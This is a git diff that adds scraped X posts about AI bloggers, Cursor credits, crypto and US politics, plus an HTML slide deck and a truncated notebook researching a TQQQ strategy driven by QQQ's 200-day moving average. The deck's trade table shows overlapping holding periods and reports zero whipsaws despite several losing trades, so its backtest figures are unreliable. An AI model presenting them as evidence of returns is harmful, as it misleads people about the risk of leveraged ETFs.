选品→找供应商→写详情页→生产品图→定价→广告文案,全套", + "url": "https://x.com/gkxspace/status/2048035527459319854", + "published_at": "2026-04-25T13:44:55+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "生财有术、得到新商学,哪个更好一些\n\n最近都在折扣阶段,生财2765、得到2888,还没进过这种大的社群,尝试一下\n\n你会选生财、得到、生财+得到都要,或者还有更好的推荐吗🤔", + "url": "https://x.com/gkxspace/status/2048032521942626343", + "published_at": "2026-04-25T13:32:58+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "R to @wolfyxbt: Image", + "url": "https://x.com/wolfyxbt/status/2048032308637442215", + "published_at": "2026-04-25T13:32:07+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "2019 年,孙哥放了巴菲特的鸽子;\n2026 年,嗯哼放了特朗普的鸽子。\n\n币圈真是个神奇的地方!", + "url": "https://x.com/wolfyxbt/status/2048031889789972748", + "published_at": "2026-04-25T13:30:27+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "RT by @Stv_Lynn: 最近校招面试了不少 985 实习生,一个很强烈的感受是:AI 工具正在把学生之间的资源差距快速放大。\n\n从我这段时间的感受看,差距真的可能到 5 倍。那些明显领先很多的同学,无一例外都比较早接触了 Claude Code、Codex 这类最好的 AI Coding 工具,也愿意自己花钱订阅。他们不只是会用工具,而是已经把它们变成了日常学习和开发的一部分。聊模型、工程、Agent、代码实践,可以很自然地聊一个小时,很多地方甚至比我理解得更深。\n\n但也有不少同学,学习成绩很好,计算机基础也扎实,只是因为家庭条件或预算有限,平时只能用国内中转站或更便宜的国产模型套餐,这个差距非常现实。现在最好的国产模型和国外一线模型,在 模型综合能力上大概还有半年左右的时间差。以前没有 AI 的时候,资源差距最多只是效率差一点,现在会直接影响视野、实践深度和自信心。\n\n这件事我最近一直在琢磨,对一些本来很有潜力的学生来说,只是因为每个月几十美元的门槛,就少接触了很多东西,我觉得挺可惜。想起我当时读大学的时候其实也经常阆中羞涩,好在大二认识了不少大牛学长带着我开始做商业项目养好了自己,挺感谢当时很耐心教我技术的各种朋友。\n\n所以我想做一个很小的尝试:拿一部分 X 发推收益,资助几位学习成绩不错、喜欢计算机、但家庭条件不太宽裕的同学,给他们提供几个月 Claude Code 或类似 AI Coding 工具的订阅,让他们真正体验一下目前比较好的模型和开发方式。\n\n不过我自己平时也比较忙,不太可能一个人长期处理申请、筛选、核验和跟进。所以也想顺便邀请一些对此有想法的朋友一起做。比如高校老师、学生负责人、开源社区成员,或者本身就在做教育、公益、开发者社区的朋友,可以一起帮忙想一个更靠谱的机制。\n\n这件事我暂时不想做大,也不想做成很复杂。先从小规模实验开始,比如每期 5 到 6 个同学,每人 3 到 4 个月,甚至也可以每周来找我视频问一些问题。想着优先看推荐、作品、学习记录和真实使用反馈,尽量避免变成单纯发钱或者拼谁会写申请,当然现在能上 X 的大学生应该不缺这个钱,所以还是需要看有没有更好的渠道。\n\n如果你有靠谱渠道,或者愿意一起参与规则设计、推荐、审核、跟进,欢迎私信我。能把这件事做得更可信一点,也许真的能帮到几个本来就很有潜力的同学。", + "url": "https://x.com/Stv_Lynn/status/2048011261473128477", + "published_at": "2026-04-25T12:08:29+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "虽然比特币回到 77,000 了,但是我还是非常悲观的\n\n我理想中的抄底价格是 35,000 的比特币\n\n感觉现在币圈虽然看起来一片欣欣向荣,但是更像是虚假繁荣,拉盘的全是一些强控筹的山寨币和小市值的 Meme,主流币除了 $BTC 和 $ETH 稍微涨了一点,其他大市值的山寨比如 $DOGE 和 $SOL 根本涨都涨不动。\n\n这种底我根本不敢抄呀,抄在半山腰至少得难受一年。\n\n感觉现在这种行情像是跌太久了跌不动了,狗庄掏点钱出来拉拉盘,榨干市场剩下的最后一点流动性,把平时比较保守但因为太久没操作的散户再钓出来收割一下。", + "url": "https://x.com/wolfyxbt/status/2047979690623955107", + "published_at": "2026-04-25T10:03:02+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 卧槽!Cursor 开始支持中文区 AI 博主了!\n这几天 Cursor 的团队成员 @edwinarbus 陆续私信了几位影响力较大的 Ai 博主,资助 1w 美金的免费额度, 算是头部 AI 产品首次对中文区做投放。但额度有时间限制,必须在 5 月 31 之前消耗掉。\n\n现在中文区只有极少部分的 KOL 拿到这个额度,所以含金量极高,统计到的只有 15 位博主,其中只有 3 位是币圈赛道的博主,分别是:\n• 杀破狼 @wolfyxbt\n• 0xAA:@0xAA_Science\n• 比特币橙子 @oragnes\n\n其他的都是纯 AI 赛道的博主,建议给他们都点个关注,毕竟算是 Cursor 认证的博主,他们的推特:\n@lxfater 、@Pluvio9yte 、 @frxiaobei 、@berryxia 、 @realNyarime 、 @dingyi 、 @CuiMao 、 @runes_leo 、 @bozhou_ai 、 @GoSailGlobal 、 @gkxspace 、 @Stv_Lynn\n\n此信息收集多数来自于 @GoSailGlobal 博主的推文", + "url": "https://x.com/bozhou_ai/status/2047968587902820543", + "published_at": "2026-04-25T09:18:55+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我靠 Cursor 刚刚送了我 10,000 美金的额度!\n\n感谢 @cursor_ai @edwinarbus 的恩赐,这周马上回归使用 Cursor!", + "url": "https://x.com/wolfyxbt/status/2047948998250840240", + "published_at": "2026-04-25T08:01:04+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "去了趟书店,被震惊了,到底谁在买这些书啊😅", + "url": "https://x.com/gkxspace/status/2047922526685155786", + "published_at": "2026-04-25T06:15:53+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "忘了说了其实我也有👉👈\n\n感谢 @cursor_ai ,这周尽快把 Stakka 给 ship 出来!", + "url": "https://x.com/Stv_Lynn/status/2047909458484040105", + "published_at": "2026-04-25T05:23:57+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我过去 2 周的总曝光量是 1320 万,收益是 1799.75 美金。\n\n平均算下来,每 1 次曝光有 0.000136 美金的收益;\n\n每 1 万次曝光 1.36 美金的收益。", + "url": "https://x.com/wolfyxbt/status/2047908983101628720", + "published_at": "2026-04-25T05:22:04+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: Cursor官方认证博主✅ 你值得关注\n\n11位晒Cursor $10,000额度博主,按X发帖时间大致排序\n\n1️⃣ 铁锤人 (@lxfater)\n 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人\n \n推文链接:https://x.com/lxfater/status/2047738439823733097\n\n2️⃣ 雪踏乌云 (@Pluvio9yte)\n 简介:聚焦 AI & Vibe coding & Prompt & Agent,大厂创业产品(年固定收入7位数),分享AI编程&出海干货\n \n推文链接:https://x.com/Pluvio9yte/status/2047768818702069974\n\n3️⃣ 比特币橙子Trader (@oragnes)\n 简介:Bitcoin Holder | Crypto Investor & Research | AI | OpenClaw | VibeCoding\n \n推文链接:https://x.com/oragnes/status/2047843289571942533\n\n4️⃣ 凡人小北 (@frxiaobei)\n 简介:行道途中。在真实业务与组织中持续验证 AI 的价值与边界 | 个人IP|商业与管理|AI 咨询\n \n推文链接:https://x.com/frxiaobei/status/2047846324771713490\n\n5️⃣http://Berryxia.AI (@berryxia)\n 简介:Building AI tools | AI System Prompt | Love Design & Coding & Share Prompt\n \n推文链接:https://x.com/berryxia/status/2047845995220988355\n\n6️⃣奶昔 (@realNyarime)\n 简介:乃月希 aka Nyarime|Founder of Naixi Networks|Developer|Photographer\n \n推文链接:https://x.com/realNyarime/status/2047834820169146559\n\n7️⃣Ding (@dingyi)\n 简介:promote your product(产品推广专家)\n \n推文链接:https://x.com/dingyi/status/2047834056734437561\n\n8️⃣CuiMao (@CuiMao)\n 简介:AI Developer / NVIDIA YES / 深度学习 / 不接广告\n 推文链接:https://x.com/CuiMao/status/2047875131113111770\n\n9️⃣Leo (@runes_leo)\n 简介:预测市场策略 · AI 工具实战 · 独立构建日常 | Prediction markets × AI tools\n \n推文链接:https://x.com/runes_leo/status/2047874815399502287\n\n🔟泊舟 (@bozhou_ai)\n 简介:AI 程序员 & Vibe 编码者 | 构建 Agent、系统提示与高效流程 | AI中转站创业中\n \n推文链接:https://x.com/bozhou_ai/status/2047847486430286317\n\n🔟1️⃣Jason Zhu (@GoSailGlobal)\n 简介:独立开发,SaaS出海,AI价值内容分享 | GoSail Lab(MCN Founder,承接产品推广)\n\n 推文链接:https://x.com/GoSailGlobal/status/2047887839791345678", + "url": "https://x.com/bozhou_ai/status/2047891848908472433", + "published_at": "2026-04-25T04:13:59+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "RT by @gkxspace: Cursor官方认证博主✅ 你值得关注\n\n11位晒Cursor $10,000额度博主,按X发帖时间大致排序\n\n1️⃣ 铁锤人 (@lxfater)\n 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人\n \n推文链接:https://x.com/lxfater/status/2047738439823733097\n\n2️⃣ 雪踏乌云 (@Pluvio9yte)\n 简介:聚焦 AI & Vibe coding & Prompt & Agent,大厂创业产品(年固定收入7位数),分享AI编程&出海干货\n \n推文链接:https://x.com/Pluvio9yte/status/2047768818702069974\n\n3️⃣ 比特币橙子Trader (@oragnes)\n 简介:Bitcoin Holder | Crypto Investor & Research | AI | OpenClaw | VibeCoding\n \n推文链接:https://x.com/oragnes/status/2047843289571942533\n\n4️⃣ 凡人小北 (@frxiaobei)\n 简介:行道途中。在真实业务与组织中持续验证 AI 的价值与边界 | 个人IP|商业与管理|AI 咨询\n \n推文链接:https://x.com/frxiaobei/status/2047846324771713490\n\n5️⃣http://Berryxia.AI (@berryxia)\n 简介:Building AI tools | AI System Prompt | Love Design & Coding & Share Prompt\n \n推文链接:https://x.com/berryxia/status/2047845995220988355\n\n6️⃣奶昔 (@realNyarime)\n 简介:乃月希 aka Nyarime|Founder of Naixi Networks|Developer|Photographer\n \n推文链接:https://x.com/realNyarime/status/2047834820169146559\n\n7️⃣Ding (@dingyi)\n 简介:promote your product(产品推广专家)\n \n推文链接:https://x.com/dingyi/status/2047834056734437561\n\n8️⃣CuiMao (@CuiMao)\n 简介:AI Developer / NVIDIA YES / 深度学习 / 不接广告\n 推文链接:https://x.com/CuiMao/status/2047875131113111770\n\n9️⃣Leo (@runes_leo)\n 简介:预测市场策略 · AI 工具实战 · 独立构建日常 | Prediction markets × AI tools\n \n推文链接:https://x.com/runes_leo/status/2047874815399502287\n\n🔟泊舟 (@bozhou_ai)\n 简介:AI 程序员 & Vibe 编码者 | 构建 Agent、系统提示与高效流程 | AI中转站创业中\n \n推文链接:https://x.com/bozhou_ai/status/2047847486430286317\n\n🔟1️⃣Jason Zhu (@GoSailGlobal)\n 简介:独立开发,SaaS出海,AI价值内容分享 | GoSail Lab(MCN Founder,承接产品推广)\n\n 推文链接:https://x.com/GoSailGlobal/status/2047887839791345678", + "url": "https://x.com/gkxspace/status/2047891848908472433", + "published_at": "2026-04-25T04:13:59+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "卧槽,收到 Cursor 送的 10,000u AI 额度! \n\n昨天 @edwinarbus 联系我送额度的时候,我还以为是骗子。不过挂着 cursor 的标,而且只是要个邮箱,我抱着试一试的态度回复了,没想道还真送了!\n这个月要多 vibe coding 些狗屎了! @VibeShit_Org @cursor_ai", + "url": "https://x.com/0xAA_Science/status/2047889676867080420", + "published_at": "2026-04-25T04:05:21+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://x.com/DavidSacks/status/2047877294476116184", + "published_at": "2026-04-25T03:16:09+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "R to @wolfyxbt: 为了利于大家分析,这里发一下我自己的后台数据", + "url": "https://x.com/wolfyxbt/status/2047877064104284194", + "published_at": "2026-04-25T03:15:14+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://x.com/DavidSacks/status/2047871382923469241", + "published_at": "2026-04-25T02:52:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://x.com/DavidSacks/status/2047867592790946189", + "published_at": "2026-04-25T02:37:36+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "卧槽!牛逼牛逼!\n\n这两周的工资涨到了 1799 美金!\n\nThank you Elon Musk!", + "url": "https://x.com/wolfyxbt/status/2047865010182148284", + "published_at": "2026-04-25T02:27:20+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 \n\n2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。", + "url": "https://x.com/svwang1/status/2047858045057909226", + "published_at": "2026-04-25T01:59:39+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Cursor大善人,我也已经领到了,在X上获得的最大一笔收入", + "url": "https://x.com/bozhou_ai/status/2047847486430286317", + "published_at": "2026-04-25T01:17:42+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://x.com/DavidSacks/status/2047842000632713369", + "published_at": "2026-04-25T00:55:54+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://x.com/DavidSacks/status/2047823154655932696", + "published_at": "2026-04-24T23:41:01+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://x.com/DavidSacks/status/2047808256047821141", + "published_at": "2026-04-24T22:41:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being credits/token hungry). GPT 5.5 is more token-efficient in subagent orchestration.", + "url": "https://x.com/AravSrinivas/status/2047788775468908840", + "published_at": "2026-04-24T21:24:24+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download", + "url": "https://x.com/cursor_ai/status/2047764656165646786", + "published_at": "2026-04-24T19:48:34+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes.\n\nA single agent session can now target a reusable workspace made of multiple folders.", + "url": "https://x.com/cursor_ai/status/2047764654760632725", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Another way to parallelize work is with new and improved worktrees in the agents window.\n\nRun isolated tasks in the background across different branches. When you're ready to test changes, move any branch into your local foreground with one click.", + "url": "https://x.com/cursor_ai/status/2047764652977958938", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Introducing /multitask in the new Cursor 3 interface.\n\nCursor can now run async subagents to parallelize your requests instead of adding them to the queue.\n\nFor already queued messages, you can ask Cursor to multitask on them instead of waiting for the current run to finish.", + "url": "https://x.com/cursor_ai/status/2047764651363180839", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + } + ] +} \ No newline at end of file diff --git a/docs/.DS_Store b/docs/.DS_Store new file mode 100644 index 0000000..01062eb Binary files /dev/null and b/docs/.DS_Store differ diff --git a/docs/LRS_notebooks/.DS_Store b/docs/LRS_notebooks/.DS_Store new file mode 100644 index 0000000..6a11e8f Binary files /dev/null and b/docs/LRS_notebooks/.DS_Store differ diff --git a/docs/LRS_notebooks/LRS_TQQQ_策略研究.html b/docs/LRS_notebooks/LRS_TQQQ_策略研究.html new file mode 100644 index 0000000..1580725 --- /dev/null +++ b/docs/LRS_notebooks/LRS_TQQQ_策略研究.html @@ -0,0 +1,869 @@ + + + + + +LRS TQQQ 策略研究 + + + + + +
+
+ + +
+ +
+ 01 +

研究动机

+ Research Motivation +
+ +
+ + +
+
+
1.1  收益潜力 vs 持有风险
+
+
-75%
+
QQQ 下跌 35% 时,TQQQ 的实际跌幅
+
+
    +
  • TQQQ = QQQ 日收益率 × 3,牛市弹性极强
  • +
  • QQQ -35%  →  TQQQ 跌幅超 75%
  • +
  • 从 -75% 回本须涨 300%,复利修复周期极长
  • +
  • 一次大熊市可能抹平多年积累收益
  • +
+
+
+ + +
+
+
1.2  波动损耗机制(Volatility Decay)
+
+
相同涨跌,不同结果
+
+
+
QQQ
+
-10% 后 +10%
+
0.9 × 1.1 =
+
0.99
+
+
VS
+
+
TQQQ
+
-30% 后 +30%
+
0.7 × 1.3 =
+
0.91
+
+
+
▲ 纯粹由波动产生的 9% 净值损耗
+
+
    +
  • 杠杆 ETF 追踪每日收益率倍数,非长期价格倍数
  • +
  • 震荡越频繁,净值侵蚀越严重
  • +
  • QQQ 持平时,TQQQ 也可能持续亏损
  • +
  • 结论:震荡 / 下行市持有 TQQQ 是数学必输
  • +
+
+
+ + +
+
+
1.3  LRS 策略的出现背景
+
+
解题思路
+
+
波动损耗
持有风险
+
+
趋势信号
过滤持仓
+
+
+
    +
  • 用客观价格信号替代主观择时预测
  • +
  • 均线提供可量化、可回测的进出场依据
  • +
  • 规则驱动,消除情绪干扰与决策偏差
  • +
  • 核心假设:趋势具有延续性
  • +
+
+
+ +
+
+ + +
+ +
+ 02 +

策略机制

+ Strategy Mechanics +
+ +
+ + +
+
+
+

2.1  核心规则

+
QQQ 200 日移动均线信号驱动 · 规则客观 · 零主观干预
+
+
+
+
每日收盘后  检查 QQQ 价格
+
+
+ 收盘价  高于  200 日均线? +
+
+
+
是  ✓
+
+
+
买入持有 TQQQ
+
▲ 上涨趋势,杠杆获利
+
+
+
+
否  ✗
+
+
+
清仓持有现金
+
▼ 趋势转弱,规避风险
+
+
+
+
+ 200 日均线 = 过去约 10 个月均价
+ 业界公认的中长期趋势判断基准 +
+
+
+
+ + +
+ + +
+
+

2.2  三层理论假设

+
+
+
+
+
趋势延续性
+
上涨趋势中继续上涨的概率 > 反转概率
+
+
+
+
+
+
均线有效过滤
+
200 日均线识别中长期趋势,而非短期噪音
+
+
+
+
+
+
杠杆收益覆盖摩擦成本
+
趋势期内 TQQQ 收益 > 假信号带来的摩擦损耗
+
+
+
+
+ + +
+
+

2.3  本质:非对称风险管理

+
+ + + + + + + + + + + + + + + + + + + + + +
纯 TQQQ 持有LRS 策略
完整享受 3x 上涨接近完整享受上涨弹性
完整承受 3x 下跌系统规避下行放大风险
路径凶险,复利难保保护复利持续性  ✓
+
+
+ +
+
+
+ + +
+ +
+ 03 +

历史回测结果

+ Backtest Results · Initial Capital $10,000 +
+ +
+ + +
+ + +
+
+
LRS 10年总收益率
+
+1,434%
+
$10K → $153,464
+
+
+
QQQ B&H 同期收益
+
+531%
+
$10K → $63,067
+
+
+
最大回撤
+
-50.5%
+
QQQ B&H -35.1%
+
+
+
交易次数 · 胜率
+
9 · 56%
+
Whipsaw 0 次 · 均持仓 331 天
+
+
+ + +
+
+
+

跨周期收益对比  —  LRS vs QQQ Buy & Hold

+
+
+
+ +
+
+ LRS 近 2 年 + +57% +
+
+
+ QQQ B&H 近 2 年 + +23% +
+
+
+ +
+
+ LRS 近 5 年 + +362% +
+
+
+ QQQ B&H 近 5 年 + +169% +
+
+
+ +
+
+ LRS 近 10 年 + +1,434% +
+
+
+ QQQ B&H 近 10 年 + +531% +
+
+
+ +
+
+ LRS 2015—2020 + +390% +
+
+
+ QQQ B&H 2015—2020 + +122% +
+
+
+ +
+
+
+
+ + +
+
+
+

近 10 年逐笔交易记录

+
2016-04-08 → 2026-04-16  ·  佣金 $1.99/单
+
+
+
+ + + + + + + + + + + + + + + + + + + + + +
开仓日期平仓日期持仓天数模式收益率
2016-04-082016-05-0628Direct-9.0%
2016-05-262016-06-2732Direct-18.8%
2016-07-052019-02-04944Direct+237.3%
2019-02-192020-02-28374Direct-2.4%
2019-03-132022-01-241047Direct-17.4%
2020-04-132022-03-01687Direct+300.6%
2023-03-032024-12-18655Direct+196.3%
2025-05-142026-03-12302Split+27.4%
2026-04-10OpenDirect+14.8%
+
+
+
+ +
+
+ +
+ + +
使用 ← → 方向键切换
+
+ + + + \ No newline at end of file diff --git a/docs/LRS_notebooks/lrs_tqqq_research.ipynb b/docs/LRS_notebooks/lrs_tqqq_research.ipynb new file mode 100644 index 0000000..6f4535b --- /dev/null +++ b/docs/LRS_notebooks/lrs_tqqq_research.ipynb @@ -0,0 +1,546 @@ +{ + "cells": [ + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "# LRS TQQQ 策略研究 Notebook\n", + "\n", + "> 目标:把「QQQ 200 日均线信号」从单一规则升级为可交易、可验证、可迭代的策略框架。\n", + "\n", + "## 研究边界\n", + "\n", + "- 标的:`TQQQ`(执行层)\n", + "- 主信号:`QQQ` 的 200 日均线(方向层)\n", + "- 宏观过滤:沿用当前项目的 6 个 Yahoo 代理指标\n", + "- 研究周期建议:最近 2 年为主,外加若干震荡窗口专项复盘\n", + "\n", + "## 你当前关注的问题(转为研究问题)\n", + "\n", + "1. 200MA 信号出现后,如何判定是否“有效信号”?\n", + "2. 宏观信号如何先行过滤,避免逆风硬上仓位?\n", + "3. 执行方式如何选:直接买入 TQQQ 还是卖 Put 接盘?\n", + "4. 仓位配比怎么定:一次满仓还是分层进场?\n", + "5. 横盘震荡阶段如何减少反复打脸?\n", + "6. 回测窗口多长合适(2 年 vs 5 年)?重点复盘哪些区间?\n" + ], + "id": "6dfb2220" + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "## 一、策略基本框架(V0.1)\n", + "\n", + "将策略拆成 4 层:\n", + "\n", + "1. **方向层(Direction)**:QQQ vs 200MA\n", + "2. **有效性层(Validation)**:信号是否可靠(避免假突破)\n", + "3. **执行层(Execution)**:直接买 TQQQ 或卖 Put 接盘\n", + "4. **风控层(Risk)**:仓位、止损、横盘降频\n", + "\n", + "---\n", + "\n", + "### 1) 方向层:基础信号\n", + "\n", + "- 多头候选:`QQQ close > MA200`\n", + "- 空仓候选:`QQQ close < MA200`\n", + "\n", + "这个层只给“方向”,不直接给“仓位大小/执行方式”。\n", + "\n", + "### 2) 有效性层:通过后才进场\n", + "\n", + "建议至少同时满足以下 3 条中的 2 条:\n", + "\n", + "- **趋势确认**:QQQ 连续 N 日站上 MA200(建议 N=3~5)\n", + "- **斜率确认**:MA200 斜率为正(例如过去 20 日 MA200 变化 > 0)\n", + "- **波动确认**:短期波动率不过高(避免消息驱动尖刺后的回落)\n", + "\n", + "### 3) 宏观过滤层(先行)\n", + "\n", + "把 6 个宏观代理映射成 Risk-On / Risk-Off 分数:\n", + "\n", + "- 美债收益率曲线(^IRX, ^FVX, ^TNX, ^TYX)\n", + "- 美元指数(DX-Y.NYB)\n", + "- 通胀预期代理(TIP)\n", + "\n", + "建议先做一个简单规则:\n", + "\n", + "- `macro_score >= +1`:允许做多\n", + "- `macro_score <= -1`:禁止新增多头,偏减仓/观望\n", + "- 介于中间:仅小仓位试错\n", + "\n", + "### 4) 执行层(买入方式决策)\n", + "\n", + "当方向+有效性+宏观全部通过后,再决定执行方式:\n", + "\n", + "- 若价格离短均线不远、波动适中:**直接买 TQQQ**\n", + "- 若价格偏离较大(追高风险)或短期波动上升:**卖 Put 等接盘**\n", + "\n", + "可先做离散选择器:\n", + "\n", + "- `execution_mode = \"direct_buy\" | \"sell_put\"`\n", + "\n", + "### 5) 风控层(仓位与震荡)\n", + "\n", + "- 基础仓位分层:`25% -> 50% -> 75% -> 100%`\n", + "- 横盘识别(例如 ADX 低、ATR 收缩、布林带收敛)后:\n", + " - 降低信号权重\n", + " - 提高确认阈值\n", + " - 最大仓位上限下调(例如从 100% 降到 50%)\n" + ], + "id": "cd26f066" + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "## 二、重点风险点(必须重点回测)\n", + "\n", + "### A. 假突破风险(Whipsaw)\n", + "\n", + "- 价格短暂上穿 MA200 后快速跌回\n", + "- 典型后果:频繁开平仓、手续费和滑点吞噬收益\n", + "- 回测要看:\n", + " - 单月交易次数\n", + " - 连续亏损次数\n", + " - 胜率变化 vs 收益变化\n", + "\n", + "### B. 杠杆路径依赖风险(TQQQ 特有)\n", + "\n", + "- 即使 QQQ 横盘,TQQQ 也可能因波动损耗表现变差\n", + "- 回测要看:\n", + " - 横盘期净值回撤\n", + " - 与 QQQ 基准收益差\n", + "\n", + "### C. 宏观反身性风险\n", + "\n", + "- 宏观信号变化往往先于价格,但有时“过早”\n", + "- 回测要看:\n", + " - 宏观过滤是否显著降低回撤\n", + " - 是否过度过滤导致错过主要上涨段\n", + "\n", + "### D. 执行方式风险(直接买 vs 卖 Put)\n", + "\n", + "- 卖 Put 在急跌中可能被动接刀\n", + "- 直接买在高波动追涨时容易回撤\n", + "- 回测要看:\n", + " - 两种执行方式在不同波动 regime 下的收益/回撤\n", + " - 行权/保证金占用(若接入真实期权数据)\n", + "\n", + "### E. 仓位风险\n", + "\n", + "- 一次性满仓对策略容错极低\n", + "- 分层建仓可能错过部分涨幅但更稳健\n", + "- 回测要看:\n", + " - 收益回撤比(Calmar)\n", + " - 最大单次回撤的可承受性\n" + ], + "id": "c94b8ff0" + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "## 三、回测窗口与样本期建议\n", + "\n", + "你的判断很合理:**先看 2 年更实用**。\n", + "\n", + "- 2 年窗口优点:更贴近当前市场结构(利率、AI 主题、波动节奏)\n", + "- 5 年窗口优点:包含更多 regime,但会引入过时结构\n", + "\n", + "建议采用“双层验证”:\n", + "\n", + "1. **主回测窗口**:最近 2 年(策略调参主依据)\n", + "2. **稳健性窗口**:补充 1~2 个横盘/高波动子区间(不调参,仅验鲁棒)\n", + "\n", + "### 横盘震荡重点复盘(方法)\n", + "\n", + "先不预设具体日期,而是程序化识别:\n", + "\n", + "- `QQQ` 的 20 日真实波动率低于分位阈值\n", + "- ADX 低于阈值(若你后续接 TA 指标)\n", + "- 价格在区间内来回穿越 MA200 次数高\n", + "\n", + "在这些区间单独统计:\n", + "\n", + "- 策略收益 vs 买入持有\n", + "- 交易频次\n", + "- 净值回撤\n", + "- 交易成本敏感性\n" + ], + "id": "5c10ec5b" + }, + { + "cell_type": "code", + "metadata": {}, + "source": [ + "import numpy as np\n", + "import pandas as pd\n", + "import yfinance as yf\n", + "\n", + "QQQ = \"QQQ\"\n", + "TQQQ = \"TQQQ\"\n", + "MACRO_TICKERS = [\"^IRX\", \"^FVX\", \"^TNX\", \"^TYX\", \"DX-Y.NYB\", \"TIP\"]\n", + "\n", + "START = (pd.Timestamp.today() - pd.DateOffset(years=2)).strftime(\"%Y-%m-%d\")\n", + "END = 